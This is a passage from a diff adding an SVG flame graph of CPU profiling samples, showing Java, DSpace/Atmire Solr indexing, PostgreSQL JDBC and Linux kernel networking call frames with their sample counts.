+<title>org/postgresql/core/v3/QueryExecutorImpl:::sendOneQuery (1 samples, 0.09%)</title><rect x="761.2" y="837" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="764.20" y="847.5" ></text>
+</g>
+<g >
+<title>irq_exit (1 samples, 0.09%)</title><rect x="964.3" y="869" width="1.1" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="967.32" y="879.5" ></text>
+</g>
+<g >
+<title>java/lang/Object:::notifyAll (1 samples, 0.09%)</title><rect x="745.1" y="869" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="748.08" y="879.5" ></text>
+</g>
+<g >
+<title>org/springframework/beans/factory/support/AbstractAutowireCapableBeanFactory:::instantiateBean (31 samples, 2.82%)</title><rect x="899.8" y="885" width="33.4" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="902.84" y="895.5" >or..</text>
+</g>
+<g >
+<title>__pthread_mutex_unlock_usercnt (1 samples, 0.09%)</title><rect x="735.4" y="741" width="1.1" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="738.41" y="751.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/common/util/JavaBinCodec:::readSolrDocument (1 samples, 0.09%)</title><rect x="1125.5" y="885" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1128.52" y="895.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc4/Jdbc4Statement:::createResultSet (1 samples, 0.09%)</title><rect x="879.4" y="805" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="882.42" y="815.5" ></text>
+</g>
+<g >
+<title>sock_recvmsg (44 samples, 4.01%)</title><rect x="89.5" y="1237" width="47.3" height="15.0" fill="rgb(241,110,110)" rx="2" ry="2" />
+<text  x="92.53" y="1247.5" >sock..</text>
+</g>
+<g >
+<title>java/util/regex/Pattern:::compile (11 samples, 1.00%)</title><rect x="920.3" y="821" width="11.8" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="923.26" y="831.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$BranchConn:::match (1 samples, 0.09%)</title><rect x="715.0" y="773" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="717.99" y="783.5" ></text>
+</g>
+<g >
+<title>x86_pmu_enable (60 samples, 5.46%)</title><rect x="13.2" y="1109" width="64.5" height="15.0" fill="rgb(249,121,121)" rx="2" ry="2" />
+<text  x="16.22" y="1119.5" >x86_pmu..</text>
+</g>
+<g >
+<title>org/dspace/content/Community:::&lt;init&gt; (12 samples, 1.09%)</title><rect x="740.8" y="965" width="12.9" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="743.78" y="975.5" ></text>
+</g>
+<g >
+<title>add_interrupt_randomness (1 samples, 0.09%)</title><rect x="631.2" y="789" width="1.0" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="634.17" y="799.5" ></text>
+</g>
+<g >
+<title>java/util/ArrayList$Itr:::hasNext (1 samples, 0.09%)</title><rect x="1048.1" y="981" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1051.14" y="991.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::socketRead0 (1 samples, 0.09%)</title><rect x="1172.8" y="917" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1175.81" y="927.5" ></text>
+</g>
+<g >
+<title>org/dspace/servicemanager/spring/DSpaceBeanPostProcessor:::postProcessBeforeInitialization (1 samples, 0.09%)</title><rect x="895.5" y="901" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="898.54" y="911.5" ></text>
+</g>
+<g >
+<title>ktime_get (1 samples, 0.09%)</title><rect x="135.7" y="1157" width="1.1" height="15.0" fill="rgb(227,89,89)" rx="2" ry="2" />
+<text  x="138.74" y="1167.5" ></text>
+</g>
+<g >
+<title>call_stub (747 samples, 68.03%)</title><rect x="372.2" y="1237" width="802.8" height="15.0" fill="rgb(226,89,89)" rx="2" ry="2" />
+<text  x="375.17" y="1247.5" >call_stub</text>
+</g>
+<g >
+<title>org/springframework/beans/factory/support/AbstractBeanFactory:::isTypeMatch (22 samples, 2.00%)</title><rect x="989.0" y="901" width="23.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="992.03" y="911.5" >o..</text>
+</g>
+<g >
+<title>__cgroup_bpf_run_filter_skb (1 samples, 0.09%)</title><rect x="227.1" y="1029" width="1.1" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="230.09" y="1039.5" ></text>
+</g>
+<g >
+<title>__ip_queue_xmit (1 samples, 0.09%)</title><rect x="1121.2" y="677" width="1.1" height="15.0" fill="rgb(230,93,93)" rx="2" ry="2" />
+<text  x="1124.22" y="687.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$GroupTail:::match (3 samples, 0.27%)</title><rect x="917.0" y="693" width="3.3" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="920.03" y="703.5" ></text>
+</g>
+<g >
+<title>tcp_send_fin (1 samples, 0.09%)</title><rect x="1121.2" y="757" width="1.1" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="1124.22" y="767.5" ></text>
+</g>
+<g >
+<title>java/net/SocketTimeoutException:::&lt;init&gt; (3 samples, 0.27%)</title><rect x="543.0" y="709" width="3.3" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="546.04" y="719.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/WriterAppender:::subAppend (10 samples, 0.91%)</title><rect x="409.8" y="853" width="10.7" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="412.78" y="863.5" ></text>
+</g>
+<g >
+<title>__tcp_push_pending_frames (154 samples, 14.03%)</title><rect x="191.6" y="1157" width="165.5" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="194.62" y="1167.5" >__tcp_push_pending_fr..</text>
+</g>
+<g >
+<title>__lookup_slow (1 samples, 0.09%)</title><rect x="11.1" y="1141" width="1.0" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="14.07" y="1151.5" ></text>
+</g>
+<g >
+<title>handle_fasteoi_irq (1 samples, 0.09%)</title><rect x="421.6" y="677" width="1.1" height="15.0" fill="rgb(234,100,100)" rx="2" ry="2" />
+<text  x="424.60" y="687.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeWithFlags (7 samples, 0.64%)</title><rect x="853.6" y="821" width="7.5" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="856.62" y="831.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/PGStream:::Receive (1 samples, 0.09%)</title><rect x="813.9" y="757" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="816.86" y="767.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (3 samples, 0.27%)</title><rect x="1017.0" y="885" width="3.2" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1019.98" y="895.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (7 samples, 0.64%)</title><rect x="1092.2" y="853" width="7.5" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1095.20" y="863.5" ></text>
+</g>
+<g >
+<title>do_softirq.part.0 (101 samples, 9.20%)</title><rect x="228.2" y="981" width="108.5" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="231.16" y="991.5" >do_softirq.pa..</text>
+</g>
+<g >
+<title>org/apache/http/impl/conn/PoolingClientConnectionManager:::releaseConnection (2 samples, 0.18%)</title><rect x="1121.2" y="965" width="2.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1124.22" y="975.5" ></text>
+</g>
+<g >
+<title>irq_enter (1 samples, 0.09%)</title><rect x="798.8" y="869" width="1.1" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="801.82" y="879.5" ></text>
+</g>
+<g >
+<title>__dev_queue_xmit (7 samples, 0.64%)</title><rect x="336.7" y="981" width="7.5" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="339.70" y="991.5" ></text>
+</g>
+<g >
+<title>wake_up_process (1 samples, 0.09%)</title><rect x="964.3" y="741" width="1.1" height="15.0" fill="rgb(218,76,76)" rx="2" ry="2" />
+<text  x="967.32" y="751.5" ></text>
+</g>
+<g >
+<title>finish_task_switch (14 samples, 1.28%)</title><rect x="115.3" y="1109" width="15.1" height="15.0" fill="rgb(242,111,111)" rx="2" ry="2" />
+<text  x="118.32" y="1119.5" ></text>
+</g>
+<g >
+<title>java/lang/String:::hashCode (1 samples, 0.09%)</title><rect x="589.3" y="949" width="1.0" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="592.25" y="959.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (7 samples, 0.64%)</title><rect x="1021.3" y="901" width="7.5" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1024.28" y="911.5" ></text>
+</g>
+<g >
+<title>nf_ct_get_tuple (1 samples, 0.09%)</title><rect x="217.4" y="997" width="1.1" height="15.0" fill="rgb(242,112,112)" rx="2" ry="2" />
+<text  x="220.41" y="1007.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2ResultSet:::getString (1 samples, 0.09%)</title><rect x="1150.2" y="917" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1153.24" y="927.5" ></text>
+</g>
+<g >
+<title>__perf_event_task_sched_out (2 samples, 0.18%)</title><rect x="100.3" y="1109" width="2.1" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="103.27" y="1119.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::read (2 samples, 0.18%)</title><rect x="1037.4" y="837" width="2.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1040.40" y="847.5" ></text>
+</g>
+<g >
+<title>nft_do_chain_inet (7 samples, 0.64%)</title><rect x="294.8" y="805" width="7.5" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="297.79" y="815.5" ></text>
+</g>
+<g >
+<title>x86_pmu_disable (1 samples, 0.09%)</title><rect x="101.3" y="1061" width="1.1" height="15.0" fill="rgb(249,121,121)" rx="2" ry="2" />
+<text  x="104.35" y="1071.5" ></text>
+</g>
+<g >
+<title>__mark_inode_dirty (1 samples, 0.09%)</title><rect x="1139.5" y="661" width="1.1" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="1142.49" y="671.5" ></text>
+</g>
+<g >
+<title>inet_ehashfn (1 samples, 0.09%)</title><rect x="245.4" y="773" width="1.0" height="15.0" fill="rgb(241,110,110)" rx="2" ry="2" />
+<text  x="248.36" y="783.5" ></text>
+</g>
+<g >
+<title>org/springframework/core/env/AbstractEnvironment:::&lt;init&gt; (89 samples, 8.11%)</title><rect x="626.9" y="901" width="95.6" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="629.87" y="911.5" >org/springf..</text>
+</g>
+<g >
+<title>org/postgresql/core/PGStream:::Receive (3 samples, 0.27%)</title><rect x="787.0" y="789" width="3.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="789.99" y="799.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="462.4" y="821" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="465.44" y="831.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (3 samples, 0.27%)</title><rect x="878.3" y="885" width="3.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="881.34" y="895.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$Curly:::match (3 samples, 0.27%)</title><rect x="917.0" y="645" width="3.3" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="920.03" y="655.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::socketRead0 (1 samples, 0.09%)</title><rect x="460.3" y="853" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="463.29" y="863.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::read (19 samples, 1.73%)</title><rect x="1092.2" y="917" width="20.4" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="1095.20" y="927.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::socketRead0 (1 samples, 0.09%)</title><rect x="740.8" y="757" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="743.78" y="767.5" ></text>
+</g>
+<g >
+<title>java/util/LinkedList:::add (1 samples, 0.09%)</title><rect x="384.0" y="933" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="386.99" y="943.5" ></text>
+</g>
+<g >
+<title>get_random_u32 (1 samples, 0.09%)</title><rect x="188.4" y="1093" width="1.1" height="15.0" fill="rgb(240,109,109)" rx="2" ry="2" />
+<text  x="191.40" y="1103.5" ></text>
+</g>
+<g >
+<title>java/lang/String:::toLowerCase (1 samples, 0.09%)</title><rect x="818.2" y="917" width="1.0" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="821.16" y="927.5" ></text>
+</g>
+<g >
+<title>org/apache/http/client/methods/HttpPost:::&lt;init&gt; (1 samples, 0.09%)</title><rect x="379.7" y="949" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="382.69" y="959.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.09%)</title><rect x="452.8" y="789" width="1.0" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="455.77" y="799.5" ></text>
+</g>
+<g >
+<title>org/apache/http/entity/mime/AbstractMultipartForm:::encode (14 samples, 1.28%)</title><rect x="432.3" y="821" width="15.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="435.35" y="831.5" ></text>
+</g>
+<g >
+<title>kmem_cache_free (1 samples, 0.09%)</title><rect x="284.0" y="677" width="1.1" height="15.0" fill="rgb(225,87,87)" rx="2" ry="2" />
+<text  x="287.04" y="687.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeQuery (1 samples, 0.09%)</title><rect x="421.6" y="821" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="424.60" y="831.5" ></text>
+</g>
+<g >
+<title>do_IRQ (1 samples, 0.09%)</title><rect x="421.6" y="693" width="1.1" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="424.60" y="703.5" ></text>
+</g>
+<g >
+<title>path_openat (1 samples, 0.09%)</title><rect x="11.1" y="1205" width="1.0" height="15.0" fill="rgb(234,99,99)" rx="2" ry="2" />
+<text  x="14.07" y="1215.5" ></text>
+</g>
+<g >
+<title>org/apache/http/protocol/BasicHttpContext:::setAttribute (1 samples, 0.09%)</title><rect x="1119.1" y="949" width="1.0" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1122.07" y="959.5" ></text>
+</g>
+<g >
+<title>apic_timer_interrupt (1 samples, 0.09%)</title><rect x="1018.1" y="869" width="1.0" height="15.0" fill="rgb(232,96,96)" rx="2" ry="2" />
+<text  x="1021.05" y="879.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$Branch:::match (3 samples, 0.27%)</title><rect x="715.0" y="837" width="3.2" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="717.99" y="847.5" ></text>
+</g>
+<g >
+<title>visit_groups_merge (1 samples, 0.09%)</title><rect x="116.4" y="1045" width="1.1" height="15.0" fill="rgb(227,89,89)" rx="2" ry="2" />
+<text  x="119.39" y="1055.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/TableRowIterator:::hasNext (2 samples, 0.18%)</title><rect x="796.7" y="933" width="2.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="799.67" y="943.5" ></text>
+</g>
+<g >
+<title>perf_pmu_enable.part.0 (5 samples, 0.46%)</title><rect x="548.4" y="629" width="5.4" height="15.0" fill="rgb(244,114,114)" rx="2" ry="2" />
+<text  x="551.42" y="639.5" ></text>
+</g>
+<g >
+<title>nft_meta_get_eval (1 samples, 0.09%)</title><rect x="326.0" y="805" width="1.0" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="328.96" y="815.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (3 samples, 0.27%)</title><rect x="1156.7" y="965" width="3.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1159.68" y="975.5" ></text>
+</g>
+<g >
+<title>com/atmire/dspace/discovery/AtmireSolrService:::buildDocument (622 samples, 56.65%)</title><rect x="376.5" y="981" width="668.4" height="15.0" fill="rgb(89,235,89)" rx="2" ry="2" />
+<text  x="379.47" y="991.5" >com/atmire/dspace/discovery/AtmireSolrService:::buildDocument</text>
+</g>
+<g >
+<title>swake_up_one (1 samples, 0.09%)</title><rect x="964.3" y="773" width="1.1" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="967.32" y="783.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (4 samples, 0.36%)</title><rect x="820.3" y="901" width="4.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="823.31" y="911.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingResultSet:::getInt (1 samples, 0.09%)</title><rect x="876.2" y="901" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="879.19" y="911.5" ></text>
+</g>
+<g >
+<title>x86_pmu_enable (5 samples, 0.46%)</title><rect x="548.4" y="613" width="5.4" height="15.0" fill="rgb(249,121,121)" rx="2" ry="2" />
+<text  x="551.42" y="623.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/TableRow:::getIntColumn (1 samples, 0.09%)</title><rect x="798.8" y="917" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="801.82" y="927.5" ></text>
+</g>
+<g >
+<title>__libc_recv (1 samples, 0.09%)</title><rect x="856.8" y="725" width="1.1" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="859.85" y="735.5" ></text>
+</g>
+<g >
+<title>java/lang/String:::toLowerCase (3 samples, 0.27%)</title><rect x="771.9" y="917" width="3.3" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="774.95" y="927.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/DelegatingPreparedStatement:::executeQuery (2 samples, 0.18%)</title><rect x="1157.8" y="933" width="2.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1160.76" y="943.5" ></text>
+</g>
+<g >
+<title>__handle_irq_event_percpu (1 samples, 0.09%)</title><rect x="137.9" y="1125" width="1.1" height="15.0" fill="rgb(230,94,94)" rx="2" ry="2" />
+<text  x="140.89" y="1135.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (14 samples, 1.28%)</title><rect x="1175.0" y="1285" width="15.0" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1177.95" y="1295.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$Branch:::match (3 samples, 0.27%)</title><rect x="715.0" y="821" width="3.2" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="717.99" y="831.5" ></text>
+</g>
+<g >
+<title>__slab_alloc.isra.0 (1 samples, 0.09%)</title><rect x="188.4" y="1125" width="1.1" height="15.0" fill="rgb(231,95,95)" rx="2" ry="2" />
+<text  x="191.40" y="1135.5" ></text>
+</g>
+<g >
+<title>__netif_receive_skb_one_core (1 samples, 0.09%)</title><rect x="332.4" y="901" width="1.1" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="335.40" y="911.5" ></text>
+</g>
+<g >
+<title>skb_release_all (1 samples, 0.09%)</title><rect x="286.2" y="709" width="1.1" height="15.0" fill="rgb(234,99,99)" rx="2" ry="2" />
+<text  x="289.19" y="719.5" ></text>
+</g>
+<g >
+<title>__GI___libc_write (3 samples, 0.27%)</title><rect x="409.8" y="773" width="3.2" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="412.78" y="783.5" ></text>
+</g>
+<g >
+<title>iptable_raw_hook (3 samples, 0.27%)</title><rect x="208.8" y="1029" width="3.2" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="211.82" y="1039.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeWithFlags (1 samples, 0.09%)</title><rect x="421.6" y="805" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="424.60" y="815.5" ></text>
+</g>
+<g >
+<title>tcp_conn_request (1 samples, 0.09%)</title><rect x="1078.2" y="181" width="1.1" height="15.0" fill="rgb(240,108,108)" rx="2" ry="2" />
+<text  x="1081.23" y="191.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/DSpaceObject$MetadataCache:::get (2 samples, 0.18%)</title><rect x="873.0" y="933" width="2.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="875.97" y="943.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::sendOneQuery (1 samples, 0.09%)</title><rect x="1152.4" y="837" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1155.39" y="847.5" ></text>
+</g>
+<g >
+<title>_register_finalizer_Java (3 samples, 0.27%)</title><rect x="824.6" y="917" width="3.2" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="827.61" y="927.5" ></text>
+</g>
+<g >
+<title>nft_do_chain_inet (1 samples, 0.09%)</title><rect x="330.3" y="853" width="1.0" height="15.0" fill="rgb(245,115,115)" rx="2" ry="2" />
+<text  x="333.26" y="863.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp/PoolablePreparedStatement:::close (1 samples, 0.09%)</title><rect x="739.7" y="885" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="742.71" y="895.5" ></text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::find (2 samples, 0.18%)</title><rect x="421.6" y="917" width="2.2" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="424.60" y="927.5" ></text>
+</g>
+<g >
+<title>x86_pmu_enable (12 samples, 1.09%)</title><rect x="117.5" y="1061" width="12.9" height="15.0" fill="rgb(249,121,121)" rx="2" ry="2" />
+<text  x="120.47" y="1071.5" ></text>
+</g>
+<g >
+<title>Java_java_net_SocketInputStream_socketRead0 (1 samples, 0.09%)</title><rect x="735.4" y="757" width="1.1" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="738.41" y="767.5" ></text>
+</g>
+<g >
+<title>__alloc_skb (14 samples, 1.28%)</title><rect x="175.5" y="1157" width="15.0" height="15.0" fill="rgb(236,102,102)" rx="2" ry="2" />
+<text  x="178.50" y="1167.5" ></text>
+</g>
+<g >
+<title>Interpreter (747 samples, 68.03%)</title><rect x="372.2" y="1205" width="802.8" height="15.0" fill="rgb(243,112,112)" rx="2" ry="2" />
+<text  x="375.17" y="1215.5" >Interpreter</text>
+</g>
+<g >
+<title>skb_push (1 samples, 0.09%)</title><rect x="352.8" y="1125" width="1.1" height="15.0" fill="rgb(234,99,99)" rx="2" ry="2" />
+<text  x="355.82" y="1135.5" ></text>
+</g>
+<g >
+<title>call_stub (747 samples, 68.03%)</title><rect x="372.2" y="1061" width="802.8" height="15.0" fill="rgb(226,89,89)" rx="2" ry="2" />
+<text  x="375.17" y="1071.5" >call_stub</text>
+</g>
+<g >
+<title>exit_to_usermode_loop (1 samples, 0.09%)</title><rect x="696.7" y="821" width="1.1" height="15.0" fill="rgb(234,99,99)" rx="2" ry="2" />
+<text  x="699.72" y="831.5" ></text>
+</g>
+<g >
+<title>nf_hook_slow (24 samples, 2.19%)</title><rect x="304.5" y="853" width="25.8" height="15.0" fill="rgb(242,112,112)" rx="2" ry="2" />
+<text  x="307.46" y="863.5" >n..</text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::processResults (1 samples, 0.09%)</title><rect x="1172.8" y="949" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1175.81" y="959.5" ></text>
+</g>
+<g >
+<title>Java_java_net_SocketInputStream_socketRead0 (19 samples, 1.73%)</title><rect x="1092.2" y="885" width="20.4" height="15.0" fill="rgb(228,91,91)" rx="2" ry="2" />
+<text  x="1095.20" y="895.5" ></text>
+</g>
+<g >
+<title>entry_SYSCALL_64_after_hwframe (2 samples, 0.18%)</title><rect x="1138.4" y="853" width="2.2" height="15.0" fill="rgb(246,118,118)" rx="2" ry="2" />
+<text  x="1141.42" y="863.5" ></text>
+</g>
+<g >
+<title>java/lang/Object:::notifyAll (1 samples, 0.09%)</title><rect x="739.7" y="869" width="1.1" height="15.0" fill="rgb(77,224,77)" rx="2" ry="2" />
+<text  x="742.71" y="879.5" ></text>
+</g>
+<g >
+<title>__poll (7 samples, 0.64%)</title><rect x="546.3" y="821" width="7.5" height="15.0" fill="rgb(233,99,99)" rx="2" ry="2" />
+<text  x="549.27" y="831.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (8 samples, 0.73%)</title><rect x="1100.8" y="837" width="8.6" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="1103.80" y="847.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/SimpleParameterList:::getV3Length (1 samples, 0.09%)</title><rect x="886.9" y="805" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="889.94" y="815.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/ItemIdIterator:::next (1 samples, 0.09%)</title><rect x="1164.2" y="997" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1167.21" y="1007.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (25 samples, 2.28%)</title><rect x="636.5" y="837" width="26.9" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="639.54" y="847.5" >[..</text>
+</g>
+<g >
+<title>org/dspace/storage/rdbms/DatabaseManager:::process (2 samples, 0.18%)</title><rect x="746.2" y="949" width="2.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="749.16" y="959.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (3 samples, 0.27%)</title><rect x="543.0" y="821" width="3.3" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="546.04" y="831.5" ></text>
+</g>
+<g >
+<title>event_sched_in.isra.0 (1 samples, 0.09%)</title><rect x="1111.5" y="597" width="1.1" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="1114.55" y="607.5" ></text>
+</g>
+<g >
+<title>__x64_sys_write (2 samples, 0.18%)</title><rect x="1138.4" y="821" width="2.2" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="1141.42" y="831.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/EntityEnclosingRequestWrapper$EntityWrapper:::writeTo (31 samples, 2.82%)</title><rect x="425.9" y="869" width="33.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="428.90" y="879.5" >or..</text>
+</g>
+<g >
+<title>iptable_raw_hook (1 samples, 0.09%)</title><rect x="303.4" y="853" width="1.1" height="15.0" fill="rgb(236,103,103)" rx="2" ry="2" />
+<text  x="306.39" y="863.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::sendBind (1 samples, 0.09%)</title><rect x="886.9" y="821" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="889.94" y="831.5" ></text>
+</g>
+<g >
+<title>org/postgresql/jdbc2/AbstractJdbc2Statement:::executeQuery (1 samples, 0.09%)</title><rect x="1028.8" y="901" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1031.80" y="911.5" ></text>
+</g>
+<g >
+<title>org/springframework/beans/factory/support/DefaultSingletonBeanRegistry:::getSingleton (4 samples, 0.36%)</title><rect x="1008.4" y="885" width="4.3" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="1011.38" y="895.5" ></text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::sendSync (1 samples, 0.09%)</title><rect x="834.3" y="837" width="1.1" height="15.0" fill="rgb(96,242,96)" rx="2" ry="2" />
+<text  x="837.28" y="847.5" ></text>
+</g>
+<g >
+<title>new_sync_write (2 samples, 0.18%)</title><rect x="409.8" y="661" width="2.1" height="15.0" fill="rgb(244,114,114)" rx="2" ry="2" />
